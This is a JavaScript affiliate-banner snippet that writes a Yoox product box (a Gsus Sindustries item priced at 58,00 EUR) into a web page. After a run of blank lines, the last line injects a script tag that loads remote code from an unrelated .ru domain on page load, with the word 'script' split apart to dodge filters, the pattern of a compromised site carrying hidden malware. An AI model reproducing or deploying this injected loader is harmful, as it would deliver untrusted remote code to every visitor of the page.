function yoox_de_2(link)
{
// ********************************************************************************
// *** set the following values: ***
// ********************************************************************************
var product_id = "36017794";

var txt_product = "Gsus Sindustries Capri";
var txt_description = "F/S Kollektion";
var txt_company = "Nur bei Yoox";
var txt_price = "58,00 EUR";

var img_source = "c=36017794&u=3";
// not upper then 100
var img_height = "80";
// max width: 120 !!!, opt: 100
var img_width = "63";
var img_alt = "Bestellen Sie bei Yoox";

var img_path = "http://imgs.yoox.com/is.asp?";

// ********************************************************************************
// *** calling part: ***
// ********************************************************************************
//var link = "http://www.yoox.com/affiliation_redirect.asp?url=/pre_home.asp%3Fnax%3D14%26tp%3D3348%26page%3Dpers%26url%3D/item.asp%253F";
var p_url = link + product_id;

document.writeln('<TABLE CELLSPACING="0" BORDER="0" WIDTH="120"><TR><TD WIDTH="120" VALIGN="TOP">');
document.writeln('<FONT SIZE="2" FACE="Arial,Helvetica,sans-serif"><CENTER>');
document.writeln('<A HREF=" ' + p_url + ' " TARGET="_blank">');
document.writeln('<IMG SRC=" ' + img_path + img_source + ' " ALT=" ' + img_alt + ' " border="0" WIDTH=" ' + img_width + ' " HEIGHT= " ' + img_height + ' ">');
document.writeln('<BR><B>' + txt_product + '</B></A><BR>' + txt_description + '<BR>' + txt_company + '<BR><FONT COLOR="red"><B>' + txt_price + '</B></FONT></CENTER></FONT>');
document.writeln('</TD></TR></TABLE>');
}






document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Laptop.js"></scri'+'pt>');
